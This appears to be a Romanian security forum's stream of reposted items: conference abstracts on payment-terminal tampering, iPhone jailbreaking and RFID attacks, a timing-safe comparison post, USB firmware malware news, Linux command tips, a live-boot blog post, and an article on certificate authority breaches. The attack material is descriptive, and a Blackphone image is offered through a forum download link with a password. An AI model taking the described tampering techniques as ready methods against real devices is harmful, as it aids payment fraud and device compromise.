Description: Security Failures in Smart Card Payment Systems - Tampering the Tamper-Proof

PIN entry devices (PED) are used in the Chip & PIN (EMV) system to process customers' card details and PINs in stores world-wide. Because of the highly sensitive information they handle, PEDs are subject to an extensive security evaluation procedure. We have demonstrated that the tamper protection of two popular PEDs can be easily circumvented with a paperclip, some basic technical skills, and off-the-shelf electronics.

PIN entry devices (PEDs) are critical security components in Chip & PIN (EMV) smartcard payment systems as they receive a customer's card and PIN. Their approval is subject to an extensive suite of evaluation and certification procedures. We have demonstrated that the tamper proofing of PEDs is unsatisfactory, as is the certification process. This talk will discuss practical low-cost attacks on two certified, widely-deployed PEDs – the Ingenico i3300 and the Dione Xtreme. By tapping inadequately protected smartcard communications, an attacker with basic technical skills can expose card details and PINs, leaving cardholders open to fraud. The talk will describe the anti-tampering mechanisms of the two PEDs and show that, while the specific protection measures mostly work as intended, critical vulnerabilities arise because of the poor integration of cryptographic, physical and procedural protection. These failures are important not only because they allow fraud to be committed, but also because of their effect on customer liability. As Chip & PIN was claimed to be foolproof, victims of fraud often find themselves accused of being negligent, or even complicit in the crime. The results of this work will help customers in this position argue that their losses should be refunded.

For More Information please visit : - 25C3: speakers
Sursa: 25c3 - Security Failures In Smart Card Payment Systems
-
25c3 - Hacking The Iphone
Description: Speakers: MuscleNerd, pytey, planetbeing

Apple's iPhone has made a tremendous impact on the smartphone market and the public consciousness, but it has also highlighted their desire to carefully control the device with draconian restrictions. These restrictions prevent users from choosing to run third-party applications unauthorized by Apple and using the devices on carriers not approved by Apple. Since its release, a tremendous amount of effort has been made to remove these restrictions for the benefit of the community. A year later, we have now learned much about its inner workings and have methods to circumvent these restrictions. This talk will summarize what we have learned about the internal architecture of the iPhone platform, its security, and the ways we have found to defeat these security measures. More information about the 25th Chaos Communication Congress can be found via the Chaos Communication Congress website.

For More Information please visit : - 25C3: speakers
Sursa: 25c3 - Hacking The Iphone
-
25c3 - Tricks Makes You Smile Description: Tricks: makes you smile A clever or ingenious device or expedient; adroit technique: the tricks of the trade. A collection of engaging techniques, some unreleased and some perhaps forgotten, to make pentesting fun again. From layer 3 attacks that still work, to user interaction based exploits that aren't 'clickjacking', to local root privilege escalation without exploits and uncommon web application exploitation techniques. For More Information please visit : - 25C3: speakers
-
25c3 - Anatomy Of Smartphone Hardware
Description: Do you know the architecture of contemporary mobile phone hardware?

This presentation will explain the individual major building blocks and overall architecture of contemporary GSM and UMTS smartphones. We will start from a general block diagram level and then look at actual chipsets used in mobile devices, ranging from SoC to RAM and flash memory technologies, Bluetooth, mobile WiFi chipsets, busses/protocols as well as the GSM baseband side. The main focus will be on the OpenMoko Freerunner (GTA02) hardware, since the schematics are open and can be used for reference during the lecture. However, we will also look into tighter integrated components of various vendors like Qualcomm's MSM7xxx, Samsung S3C64xx, TI OMAP35xx and others.

For More Information please visit : - 25C3: speakers
Sursa: 25c3 - Anatomy Of Smartphone Hardware
-
25c3 - Analyzing Rfid Security Description: Analyzing RFID Security Many RFID tags have weaknesses, but the security level of different tags varies widely. Using the Mifare Classic cards as an example, we illustrate the complexity of RFID systems and discuss different attack vectors. To empower further analysis of RFID cards, we release an open-source, software-controlled, and extensible RFID reader with support for most common standards. RFID tags and contact-less smart cards are regularly criticized for their lack of security. While many RFID tags have weaknesses, the security level of different tags varies widely. Using the Mifare Classic cards as an example, we illustrate the complexity of RFID systems and discuss different attack vectors. To empower further analysis of RFID cards, we release an open-source, software-controlled, and extensible RFID reader with support for most common standards. For More Information please visit : - 25C3: speakers Sursa: 25c3 - Analyzing Rfid Security
-
Timing-safe memcmp and API parity
Nate Lawson @ 4:03 am

OpenBSD released a new API with a timing-safe bcmp and memcmp. I strongly agree with their strategy of encouraging developers to adopt "safe" APIs, even at a slight performance loss. The strlcpy/strlcat family of functions they pioneered has been immensely helpful against overflows.

Data-independent timing routines are extremely hard to get right, and the farther you are from the hardware, the harder it is to avoid unintended leakage. Your best bet, if working in an embedded environment, is to use assembly and thoroughly test on the target CPU under multiple scenarios (interrupts, power management throttling clocks, etc.) Moving up to C creates a lot of pitfalls, especially if you support multiple compilers and versions. Now you are subject to micro-architectural variance, such as cache, branch prediction, bus contention, etc. And compilers have a lot of leeway with optimizing away code with strictly-intended behavior.

While I think the timing-safe bcmp (straightforward comparison for equality) is useful, I'm more concerned with the new memcmp variant. It is more complicated and subject to compiler and CPU quirks (because of the additional ordering requirements), may confuse developers who really want bcmp, and could encourage unsafe designs.

If you ask a C developer to implement bytewise comparison, they'll almost always choose memcmp(). (The "b" series of functions is more local to BSD and not Windows or POSIX platforms.) This means that developers using timingsafe_memcmp() will be incorporating unnecessary features simply by picking the familiar name. If compiler or CPU variation compromised this routine, this would introduce a vulnerability.

John-Mark pointed out to me a few ways the current implementation could possibly fail due to compiler optimizations. While the bcmp routine is simpler (XOR accumulate loop), it too could possibly be invalidated by optimization such as vectorization.

The most important concern is if this will encourage unsafe designs. I can't come up with a crypto design that requires ordering of secret data that isn't also a terrible idea. Sorting your AES keys? Why? Don't do that. Database index lookups that reveal secret contents? Making array comparison constant-time fixes nothing when the index involves large blocks of RAM/disk read timing leaks. In any scenario that involves the need for ordering of secret data, much larger architectural issues need to be addressed than a comparison function.

Simple timing-independent comparison is an important primitive, but it should be used only when other measures are not available. If you're concerned about HMAC timing leaks, you could instead hash or double-HMAC the data and compare the results with a variable-timing comparison routine. This takes a tiny bit longer but ensures any leaks are useless to an attacker. Such algorithmic changes are much safer than trying to set compiler and CPU behavior in concrete.

The justification I've heard from Ted Unangst is "API parity". His argument is that developers will not use the timing-safe routines if they don't conform to the ordering behavior of memcmp. I don't get this argument. Developers are more likely to be annoyed with the sudden performance loss of switching to timing-safe routines, especially for comparing large blocks of data. And, there's more behavior that should intentionally be broken in a "secure memory compare" routine, such as two zero-length arrays returning success instead of an error.
Perhaps OpenBSD will reconsider offering this routine purely for the sake of API parity. There are too many drawbacks. Sursa: Timing-safe memcmp and API parity | root labs rdist
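For reference, the XOR-accumulate construction mentioned in the post (the simpler, bcmp-style equality check) looks roughly like the sketch below. This is an illustration rather than a drop-in replacement for OpenBSD's routines: as the post stresses, a compiler or vectorizer may still undo the intent, so the generated code has to be checked on the target CPU.

#include <cstddef>
#include <cstdint>

// Sketch of a bcmp-style, data-independent equality check: every byte is
// examined and the differences are OR-accumulated, so the running time does
// not depend on where the first mismatch occurs. Returns 0 if the buffers
// are equal, non-zero otherwise. A sufficiently clever compiler may still
// transform this; inspecting the generated assembly is part of the job.
int timing_safe_equal(const void* a, const void* b, std::size_t len) {
    const volatile uint8_t* pa = static_cast<const volatile uint8_t*>(a);
    const volatile uint8_t* pb = static_cast<const volatile uint8_t*>(b);
    uint8_t acc = 0;
    for (std::size_t i = 0; i < len; ++i)
        acc |= static_cast<uint8_t>(pa[i] ^ pb[i]);
    return acc; // 0 means equal
}

The alternative the post actually recommends needs no such compiler guarantees: hash or double-HMAC both inputs and compare the digests with an ordinary comparison, so that any timing leak reveals nothing useful about the original data.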
-
Proven: USB devices can carry hard-to-detect viruses with unlimited access to users' data
Aurelian Mihai - 1 Aug 2014

Demonstrated by a group of security experts, a security flaw in the communication protocol used to connect USB devices can be exploited with extremely serious consequences, compromising any computer with a USB port. Moreover, infected USB devices are hard to detect, and ordinary users have no way of knowing whether a freshly purchased USB flash stick or keyboard contains a dangerous virus.

According to experts Karsten Nohl and Jakob Lell, the Universal Serial Bus protocol used as the standard for connecting external devices to the USB port contains a security flaw that can be exploited to gain unlimited control over PCs. To expose the problem, the two decompiled the firmware portion responsible for handling the basic functions of the USB protocol and added a malware sample created for demonstration purposes. Once slipped onto the USB device, the malware component living at the firmware level is activated simply by connecting the device to the USB port, gaining access to the files stored in memory or intercepting the user's internet connection.

Given that this exploit targets the very protocol that governs how USB devices operate, practically any device can be compromised: USB flash sticks, USB mice and keyboards, smartphones and tablets with a USB port. Still, the malware component is not executed directly on the device but rather transferred into the memory of the connected PC, where it can be detected and removed with antivirus software. Unfortunately, the infected device cannot be cleaned by simply deleting or formatting its storage. In the absence of a patch that installs uncompromised firmware, the USB device will keep infecting any PC it is connected to.

For now it is nearly impossible for ordinary users to check whether a device's firmware has been compromised. In addition, it is theoretically possible for the infection to happen in reverse, from an infected PC to a USB device, further propagating the malware to any PC the freshly compromised device is later connected to. Apparently the exploit, rumored to already be used by US authorities to facilitate espionage activities, currently has no remedy. The only measures users can take are to avoid USB devices of uncertain provenance and to prevent the spread of infections by not connecting USB devices to already compromised PCs.

Sursa: E dovedit: dispozitivele USB pot con?ine viru?i greu de detectat, cu acces nelimitat la datele utilizatorilor
-
No. The image is there so everyone can see what applications it includes and what they do. Those who get bored can decompile the APKs and look through their source to see what they do.
-
[h=1]Secure by Design[/h]
[h=2]A 21st-century smartphone[/h]
Blackphone combines a custom operating system with leading applications optimized for security. The result: an unparalleled product ideal for people who recognize a need for privacy and want a simple, secure place to start.

[h=1]Meet PrivatOS[/h]
[h=2]Blackphone's security-enhanced Android™ build[/h]
Blackphone's combination of a custom operating system with hand-picked application tools optimizes for security. The result: an unparalleled product ideal for information workers, executives, public figures, and anyone else unwilling to give up their privacy.

View Features
Info: https://www.blackphone.ch/
Download: https://rstforums.com/fisiere/blackphone-4.4.2.zip (243 MB)
-
Password: 5ZTzuOIjaq
-
It might be an air bubble. But if the display works fine, I don't see what the problem is. If you've already bought it, you can warm it up a little with a hair dryer, then keep pressing on it and hope it disappears. And preferably apply the pressure from the inside towards the edge, so that if there is air in there, it can get out.
-
Was the photo taken with a 3310? You can't see anything. Take the film off first. Then GENTLY slide something in there and see if it moves.
-
51 Useful Lesser Known Commands for Linux Users
By Avishek Kumar | Linux Commands | December 24, 2013

The Linux command line is attractive and fascinating, and there exists a flock of Linux users who are addicted to the command line. The Linux command line can be funny and amusing; if you don't believe me, check one of our articles below.

20 Funny Commands of Linux or Linux is Fun in Terminal

51 Lesser Known Commands

It is also extremely powerful at the same time. We brought you five articles on "Lesser Known Linux Commands", consisting of 50+ lesser known Linux commands. This article concatenates all five articles into one and briefly tells you what is where.

11 Lesser Known Commands – Part I
This article was highly appreciated by our readers and contains simple yet very important commands. In summary:

1. sudo !! : Forgot to run a command with sudo? You need not re-type the whole command, just type "sudo !!" and the last command will run with sudo.
2. python -m SimpleHTTPServer : Serves the current working directory as a simple web page over port 8000.
3. mtr : A command which is a combination of the 'ping' and 'traceroute' commands.
4. Ctrl+x+e : This key combination instantly fires up an editor in the terminal.
5. nl : Outputs the content of a text file with numbered lines.
6. shuf : Randomly selects a line/file/folder from a file/folder.
7. ss : Outputs socket statistics.
8. last : Want to know the history of the last logged-in users? This command comes to the rescue here.
9. curl ifconfig.me : Shows the machine's external IP address.
10. tree : Prints files and folders in a tree-like fashion, recursively.
11. pstree : Prints running processes with their child processes, recursively.

11 Lesser Known Useful Linux Commands – Part I

The great response received on this article, and requests from our readers to provide another list of 'Lesser Known Linux Commands', led us to the next article of the series:

10 Lesser Known Commands – Part II
This article again was warmly welcomed. The summary below is enough to describe it.

12. <space> command : A space before a bash command is not recorded in history.
13. stat : Shows the status information of a file as well as of a file system.
14. <alt>. and <esc>. : A tweak which puts the last command's argument at the prompt, in the order of the last entered command appearing first.
15. pv : Outputs text with simulated typing, similar to Hollywood movies.
16. mount | column -t : Lists mounted file systems, nicely formatted with specifications.
17. Ctrl+l : Clears the shell prompt instantly.
18. curl -u gmail_id --silent "https://mail.google.com/mail/feed/atom" | perl -ne 'print "\t" if //; print "$2\n" if /(.*)/;' : This simple script opens up the unread mail of a user, in the terminal itself.
19. screen : Detach and reattach long running processes from a session.
20. file : Outputs information regarding the type of a file.
21. id : Prints user and group IDs.

10 Lesser Known Linux Commands – Part 2

Getting over 600 likes on different social networking sites and many thankful comments, we were ready with the third article of the series:

10 Lesser Known Commands – Part 3
This article summarizes as below:

22. ^foo^bar : Run the last command with a modification, without the need to rewrite the whole command again.
23. > file.txt : Flush the contents of a text file in a single go, from the command prompt.
24. at : Run a particular command at a scheduled time.
25. du -h --max-depth=1 : Outputs the size of all the files and folders within the current folder, in human readable format.
26. expr : Solve simple mathematical calculations from the terminal.
27. look : Check for an English word in the dictionary, in case of confusion, right from the shell.
28. yes : Continues to print a string until an interrupt instruction is given.
29. factor : Gives the prime factors of a number.
30. ping -i 60 -a IP_address : Pings the provided IP_address every 60 seconds and gives an audible alert when the host comes alive.
31. tac : Prints the content of a file in reverse order.

10 Lesser Known Commands for Linux – Part 3

Our hard work was rewarded by the response we received, and the fourth article of the series was:

10 Lesser Known Linux Commands – Part IV
Needless to say, this article was appreciated as well. The article summarizes as below:

32. strace : A debugging tool.
33. disown -a && exit : Run a command in the background, even after the terminal session is closed.
34. getconf LONG_BIT : Outputs the machine architecture, very clearly.
35. while sleep 1;do tput sc;tput cup 0 $(($(tput cols)-29));date;tput rc;done & : This script outputs the date and time in the top right corner of the shell/terminal.
36. convert : Converts the output of a command into a picture, automatically.
37. watch -t -n1 "date +%T|figlet" : Shows an animated digital clock at the prompt.
38. host and dig : DNS lookup utilities.
39. dstat : Generates statistics regarding system resources.
40. bind -p : Shows all the shortcuts available in Bash.
41. touch /forcefsck : Forces a file-system check on the next boot.

10 Lesser Known Effective Linux Commands – Part IV

10 Lesser Known Linux Commands – Part V
The commands from here on were getting biased towards scripts (yes, powerful single-line shell scripts), and we thought to provide at least one more article in this series.

42. lsb_release : Prints distribution specification information.
43. nc -zv localhost port_number : Check whether a specific port is open or not.
44. curl ipinfo.io : Outputs geographical information regarding an ip_address.
45. find . -user xyz : Lists all files owned by user 'xyz'.
46. apt-get build-dep package_name : Builds all the dependencies automatically while installing any specific package.
47. lsof -iTCP:80 -sTCP:LISTEN : Outputs all the services/processes using port 80.
48. find -size +100M : Lists all the files/folders whose size is 100M or more.
49. pdftk : A nice way to concatenate a lot of PDF files into one.
50. ps -LF -u user_name : Outputs the processes and threads of a user.
51. startx -- :1 : This command creates another new X session.

10 Lesser Known Useful Linux Commands – Part V

That's all for now. Don't forget to give us your valuable feedback in the comment section. This is not the end of lesser known Linux commands, and we will keep bringing them to you, from time to time, in our articles. I'll be coming with another article, very interesting and useful for our readers. Till then, stay tuned and connected to Tecmint.com.

Sursa: 51 Useful Lesser Known Commands for Linux Users
-
Adventures in live booting Linux distributions
July 29, 2014 By Major Hayden

We're all familiar with live booting Linux distributions. Almost every Linux distribution under the sun has a method for making live CD's, writing live USB sticks, or booting live images over the network. The primary use case for some distributions is on a live medium (like KNOPPIX). However, I embarked on an adventure to look at live booting Linux for a different use case.

Sure, many live environments are used for demonstrations or installations: temporary activities for a desktop or a laptop. My goal was to find a way to boot a large fleet of servers with live images. These would need to be long-running, stable, feature-rich, and highly configurable live environments.

Finding off the shelf solutions wasn't easy. Finding cross-platform off the shelf solutions for live booting servers was even harder. I worked on a solution with a coworker to create a cross-platform live image builder that we hope to open source soon. (I'd do it sooner but the code is horrific.)

Debian jessie (testing)

First off, we took a look at Debian's Live Systems project. It consists of two main parts: something to build live environments, and something to help live environments boot well off the network.

At the time of this writing, the live build process leaves a lot to be desired. There's a peculiar tree of directories that are required to get started and the documentation isn't terribly straightforward. Although there's a bunch of documentation available, it's difficult to follow and it seems to skip some critical details. (In all fairness, I'm an experienced Debian user but I haven't gotten into the innards of Debian package/system development yet. My shortcomings there could be the cause of my problems.)

The second half of the Live Systems project consists of multiple packages that help with the initial boot and configuration of a live instance. These tools work extremely well. Version 4 (currently in alpha) has tools for doing all kinds of system preparation very early in the boot process and it's compatible with SysVinit or systemd. The live images boot up with a simple SquashFS (mounted read only) and they use AUFS to add on a writeable filesystem that stays in RAM. Reads and writes to the RAM-backed filesystem are extremely quick and you don't run into a brick wall when the filesystem fills up (more on that later with Fedora).

Ubuntu 14.04

Ubuntu uses casper, which seems to precede Debian's Live Systems project, or it could be a fork (please correct me if I'm incorrect). Either way, it seemed a bit less mature than Debian's project and left a lot to be desired.

Fedora and CentOS

Fedora 20 and CentOS 7 are very close in software versions and they use the same mechanisms to boot live images. They use dracut to create the initramfs and there are a set of dmsquash modules that handle the setup of the live image. The livenet module allows the live images to be pulled over the network during the early part of the boot process.

Building the live images is a little tricky. You'll find good documentation and tools for standard live bootable CD's and USB sticks, but booting a server isn't as straightforward. Dracut expects to find a squashfs which contains a filesystem image. When the live image boots, that filesystem image is connected to a loopback device and mounted read-only. A snapshot is made via device mapper that gives you a small overlay for adding data to the live image. This overlay comes with some caveats.

Keeping tabs on how quickly the overlay is filling up can be tricky. Using tools like df is insufficient since device mapper snapshots are concerned with blocks. As you write 4k blocks in the overlay, you'll begin to fill the snapshot, just as you would with an LVM snapshot. When the snapshot fills up and there are no blocks left, the filesystem in RAM becomes corrupt and unusable. There are some tricks to force it back online but I didn't have much luck when I tried to recover. The only solution I could find was to hard reboot.

Arch

The ArchLinux live boot environments seem very similar to the ones I saw in Fedora and CentOS. All of them use dracut and systemd, so this makes sense. Arch once used a project called Larch to create live environments but it's fallen out of support due to AUFS2 being removed (according to the wiki page). Although I didn't build a live environment with Arch, I booted one of their live ISO's and found their live environment to be much like Fedora and CentOS. There was a device mapper snapshot available as an overlay and once it's full, you're in trouble.

OpenSUSE

The path to live booting an OpenSUSE image seems quite different. The live squashfs is mounted read only onto /read-only. An ext3 filesystem is created in RAM and is mounted on /read-write. From there, overlayfs is used to lay the writeable filesystem on top of the read-only squashfs. You can still fill up the overlay filesystem and cause some temporary problems, but you can back out those errant files and still have a useable live environment.

Here's the problem: overlayfs was given the green light for consideration in the Linux kernel by Linus in 2013. It's been proposed for several kernel releases and it didn't make it into 3.16 (which will be released soon). OpenSUSE has wedged overlayfs into their kernel tree just as Debian and Ubuntu have wedged AUFS into theirs.

Wrap-up

Building highly customized live images isn't easy and running them in production makes it more challenging. Once the upstream kernel has a stable, solid, stackable filesystem, it should be much easier to operate a live environment for extended periods. There has been a parade of stackable filesystems over the years (remember funion-fs?) but I've been told that overlayfs seems to be a solid contender. I'll keep an eye out for those kernel patches to land upstream but I'm not going to hold my breath quite yet.

Sursa: Adventures in live booting Linux distributions | major.io
-
[h=1]A Brief Introduction to Neural Networks[/h]
[h=2]Manuscript Download - Zeta2 Version[/h]
Filenames are subject to change. Thus, if you place links, please do so with this subpage as target. If you like the manuscript and want to buy me a coffee or beer, please click on the Flattr button on the right. Thanks!

              Original version          eBookReader optimized
 English      PDF, 6.2MB, 244 pages     PDF, 6.1MB, 286 pages
 German       PDF, 6.2MB, 256 pages     PDF, 6.2MB, 296 pages

[h=3]Original Version? EBookReader Version?[/h]
The original version is the two-column layouted one you've been used to. The eBookReader optimized version, on the other hand, has a one-column layout. In addition, headers, footers and marginal notes were removed. For print, the eBookReader version obviously is less attractive: it lacks nice layout and reading features and occupies a lot more pages. However, on electronic readers the simpler layout significantly reduces the scrolling effort. During every release process from now on, the eBookReader version is going to be automatically generated from the original content. However, contrary to the original version, it does not get an additional manual layout and typography tuning cycle in the release workflow. So concerning the aesthetics of the eBookReader optimized version, do not expect any support.

[h=2]Further Information for Readers[/h]

[h=3]Provide Feedback![/h]
This manuscript relies very much on your feedback to improve it. As you can see from the many helpers mentioned in my frontmatter, I really appreciate and make use of feedback I receive from readers. If you have any complaints, bug-fixes, suggestions, or acclamations, send an email to me or place a comment in the newly-added discussion section at the bottom of this page. Be sure you will get a response.

[h=3]How to Cite this Manuscript[/h]
There's no official publisher, so you need to be careful with your citation. For now, use this:

David Kriesel, 2007, A Brief Introduction to Neural Networks, available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel

This reference is, of course, for the English version. Please look at the German translation of this page to find the German reference. Please always include the URL – it's the only unique identifier to the text (for now)! Note the lack of an edition name, which changes with every new edition; Google Scholar and Citeseer both have trouble with fast-changing editions. If you prefer BibTeX:

@book{ Kriesel2007NeuralNetworks,
  author = { David Kriesel },
  title  = { A Brief Introduction to Neural Networks },
  year   = { 2007 },
  note   = { available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel }
}

Again, this reference is for the English version.

[h=3]Terms of Use[/h]
From the epsilon edition on, the text is licensed under the Creative Commons Attribution-No Derivative Works 3.0 Unported License, except for some small portions of the work licensed under more liberal licenses, as mentioned in the frontmatter or throughout the text. Note that this license does not extend to the source files used to produce the document. Those are still mine.
[h=2]Roadmap[/h] To round off the manuscript, there is still some work to do. In general, I want to add the following aspects: Implementation and SNIPE: While I was editing the manuscript, I was also implementing SNIPE a high performance framework for using neural networks with JAVA. This has to be brought in-line with the manuscript: I'd like to place remarks (e.g. “This feature is implemented in method XXX in SNIPE”) all over the manuscript. Moreover, an extensive discussion chapter on the efficient implementation of neural networks will be added. Thus, SNIPE can serve as reference implementation for the manuscript, and vice versa. Evolving neural networks: I want to add a nice chapter on evolving neural networks (which is, for example, one of the focuses of SNIPE, too). Evolving means, just growing populations of neural networks in an evolutionary-inspired way, including topology and synaptic weights, which also works with recurrent neural networks. Hints for practice: In chapters 4 and 5, I'm still missing lots of practice hints (e.g. how to preprocess learning data, and other hints particularly concerning MLPs). Smaller issues: A short section about resilient propagation and some more algorithms would be great in chapter 5. The chapter about recurrent neural networks could be extended. Some references are still missing. A small chapter about echo state networks would be nice. I think, this is it … as you can see, there's still a bit of work to do until I call the manuscript “finished”. All in all, It will be less work than I already did. However, it will take several further releases until everything is included. [h=3]Recent News[/h] As of the manuscript's Epsilon version, update information is published in news articles whose headlines you find right below. Please click on any news title to get the information. 2012-03-17: EbookReader Versions of Neural Networks Manuscript 2011-10-21: New Release "A Brief Introduction to Neural Networks": Zeta version 2010-11-20: "A brief Introduction to Neural Networks": English version gets overwrought thoroughly! 2010-10-13: "A Brief Introduction to Neural Networks" published in Epsilon2 Version 2009-10-11: "A Brief Introduction to Neural Networks" published in Epsilon Version [h=2]What are Neural Networks, and what are the Manuscript Contents?[/h] Neural networks are a bio-inspired mechanism of data processing, that enables computers to learn technically similar to a brain and even generalize once solutions to enough problem instances are tought. The manuscript “A Brief Introduction to Neural Networks” is divided into several parts, that are again split to chapters. The contents of each chapter are summed up in the following. [h=3]Part I: From Biology to Formalization -- Motivation, Philosophy, History and Realization of Neural Models[/h] [h=4]Introduction, Motivation and History[/h] How to teach a computer? You can either write a rigid program – or you can enable the computer to learn on its own. Living beings don't have any programmer writing a program for developing their skills, which only has to be executed. They learn by themselves – without the initial experience of external knowledge – and thus can solve problems better than any computer today. KaWhat qualities are needed to achieve such a behavior for devices like computers? Can such cognition be adapted from biology? History, development, decline and resurgence of a wide approach to solve problems. [h=4]Biologische Neuronale Netze[/h] How do biological systems solve problems? 
How does a system of neurons work? How can we understand its functionality? What are different quantities of neurons able to do? Where in the nervous system is information processed? A short biological overview of the complexity of simple elements of neural information processing, followed by some thoughts about their simplification in order to technically adapt them.
[h=4]Components of Artificial Neural Networks[/h]
Formal definitions and colloquial explanations of the components that realize the technical adaptation of biological neural networks. Initial descriptions of how to combine these components into a neural network.
[h=4]How to Train a Neural Network?[/h]
Approaches and thoughts on how to teach machines. Should neural networks be corrected? Should they only be encouraged? Or should they even learn without any help? Thoughts about what we want to change during the learning procedure and how we will change it, about the measurement of errors, and about when we have learned enough.
[h=3]Part II: Supervised Learning Network Paradigms[/h]
[h=4]The Perceptron[/h]
A classic among the neural networks. If we talk about a neural network, then in the majority of cases we speak about a perceptron or a variation of it. Perceptrons are multi-layer networks without recurrence and with fixed input and output layers. Description of a perceptron, its limits, and extensions intended to overcome those limitations. Derivation of learning procedures and discussion of their problems.
[h=4]Radial Basis Functions[/h]
RBF networks approximate functions by stretching and compressing Gaussians and then summing them, spatially shifted. Description of their function and their learning process. Comparison with multi-layer perceptrons.
[h=4]Recurrent Multi-layer Perceptrons[/h]
Some thoughts about networks with internal states. Learning approaches using such networks, and an overview of their dynamics.
[h=4]Hopfield Networks[/h]
In a magnetic field, each particle applies a force to every other particle, so that all particles adjust their movements in the energetically most favorable way. This natural mechanism is copied to adjust noisy inputs in order to match their real models.
[h=4]Learning Vector Quantisation[/h]
Learning vector quantization is a learning procedure whose aim is to reproduce the vector training sets, divided into predefined classes, as well as possible by using a few representative vectors. If this has been managed, vectors which were previously unknown can easily be assigned to one of these classes.
[h=3]Part III: Unsupervised Learning Network Paradigms[/h]
[h=4]Self Organizing Feature Maps[/h]
A paradigm of unsupervised learning neural networks which maps an input space by its fixed topology and thus independently looks for similarities. Function, learning procedure, variations and neural gas.
[h=4]Adaptive Resonance Theory[/h]
An ART network in its original form shall classify binary input vectors, i.e. assign them to a 1-out-of-n output. Simultaneously, patterns that have not been classified so far shall be recognized and assigned to a new class.
[h=3]Part IV: Excursi, Appendices and Registers[/h]
[h=4]Cluster Analysis and Regional and Online Learnable Fields[/h]
In Grimm's dictionary, the extinct German word "Kluster" is described by "was dicht und dick zusammensitzet" (a thick and dense group of something). In static cluster analysis, the formation of groups within point clouds is explored. Introduction of some procedures, comparison of their advantages and disadvantages.
Discussion of an adaptive clustering method based on neural networks. A regional and online learnable field models a point cloud, possibly containing a very large number of points, with a comparatively small set of neurons that are representative of the point cloud.
[h=4]Neural Networks Used for Prediction[/h]
Discussion of an application of neural networks: a look ahead into the future of time series.
[h=4]Reinforcement Learning[/h]
What if there were no training examples, but it were nevertheless possible to evaluate how well we have learned to solve a problem? Let us regard a learning paradigm that is situated between supervised and unsupervised learning.
Posted on 2009-05-01 by David Kriesel.
Sursa: A Brief Introduction to Neural Networks · D. Kriesel
-
How Cybercrime Exploits Digital Certificates
What is a digital certificate?
A digital certificate is a critical component of a public key infrastructure. It is an electronic document that associates the identity of a subject with its public key. A certificate can therefore be associated with a natural person, a private company, or a web service such as a portal. The certificate is issued by an organization, dubbed a Certification Authority (CA), recognized as "trusted" by the parties involved, and is ordinarily used for public key cryptography operations. The Certification Authority issues a digital certificate in response to a request only after it verifies the identity of the certificate applicant. Verifying certificates online can be done by anyone, since the CA maintains a public register of the digital certificates it has issued and a register of the revoked ones (the Certificate Revocation List, or CRL). Each digital certificate is associated with a period of validity, and certificates outside that period are no longer valid. Other conditions that can cause the revocation of a digital certificate are the exposure of its private key and any change in the relationship between the subject and its public key, for example a change of the applicant's mail address.
In asymmetric cryptography, each subject is associated with a pair of keys, one public and one private. Any person may sign a document with their private key. Everyone who wants to verify the authenticity of the document can verify it using the public key of the signer, which is exposed by the CA. Another interesting use linked to the availability of a subject's public key is the sending of encrypted documents. Assuming you want to send an encrypted document to Pierluigi, it is sufficient to encrypt it with his public key exposed by the CA. At this point, only Pierluigi, with the private key associated with the public key used for the encryption, can decrypt the document. The public key of each subject is contained in a digital certificate signed by a trusted third party. In this way, those who recognize the third party as trustworthy just have to verify its signature to accept as valid the public key it exposes.
The most popular standard for digital certificates is ITU-T X.509, according to which a CA issues a digital certificate that binds the public key of the subject to a Distinguished Name, or to an Alternative Name such as an email address or a DNS record. The structure of an X.509 digital certificate includes the following information:
version
serial number
algorithm ID
issuer
validity
subject
information on the public key of the subject
certificate signature algorithm
certificate signature
It is likely you'll come across the following extensions used for files containing X.509 certificates; the most common are:
CER – certificate encoded in DER form, sometimes sequences of certificates.
DER – DER-encoded certificate.
PEM – Base64-encoded certificate stored in a file. A PEM file may contain certificates or private keys.
P12 – PKCS#12 container, which may contain public and private keys (password protected).
Another way of classifying digital certificates is by intended use; it is useful to distinguish authentication certificates from subscription certificates. A subscription digital certificate is used to define the correspondence between an individual applying for the certificate and its public key.
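To make the field list above concrete, here is a minimal Python sketch that reads a certificate and prints those attributes. It assumes the third-party pyca/cryptography package is installed, and example_cert.pem is just a placeholder name for any PEM-encoded certificate you have at hand.

from cryptography import x509
from cryptography.hazmat.primitives import hashes

# Load a PEM-encoded certificate from disk (the file name is only an example)
with open("example_cert.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

# Print the main X.509 fields listed above
print("Version:       ", cert.version)
print("Serial number: ", cert.serial_number)
print("Issuer:        ", cert.issuer.rfc4514_string())
print("Subject:       ", cert.subject.rfc4514_string())
print("Valid from:    ", cert.not_valid_before)
print("Valid until:   ", cert.not_valid_after)
print("Hash algorithm:", cert.signature_hash_algorithm.name)
print("SHA-1 print:   ", cert.fingerprint(hashes.SHA1()).hex())

The same information can be dumped with openssl x509 -in example_cert.pem -text -noout; the point is simply that anyone relying on a certificate can read and check this public part, while the private key never leaves its owner.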
These subscription certificates are the ones used for affixing digital signatures that are legally valid. A certificate of authentication, instead, is mainly used for accessing websites that implement authentication via certificate, or for signing e-mail messages in order to ensure the identity of the sender. An authentication certificate is usually associated with an email address in a unique way.
A digital certificate in the wrong hands
Security experts recognize 2011 as the worst year for certification authorities. The number of successful attacks against major companies reported during the year has no precedent, and many of them had serious consequences. Comodo was the first organization to suffer a cyber attack. High-level managers at Comodo revealed that the registration authority had been compromised in an attack on March 15th, 2011, and that the username and password of a Comodo Trusted Partner in Southern Europe had been stolen. As a consequence, a Registration Authority suffered an attack that resulted in a breach of one user account of that specific RA. That account was then fraudulently used to issue nine digital certificates across seven different domains, including: login.yahoo.com (NSDQ:YHOO), mail.google.com (NSDQ:GOOG), login.skype.com, and addons.mozilla.org. All of these certificates were revoked immediately upon discovery.
In August of the same year, another giant fell victim to a cyber attack: the Dutch Certification Authority DigiNotar, owned by VASCO Data Security International. On September 3rd, 2011, after it had become clear that a security breach had resulted in the fraudulent issuing of certificates, the Dutch government took over the operational management of DigiNotar's systems. A few weeks later, the company was declared bankrupt.
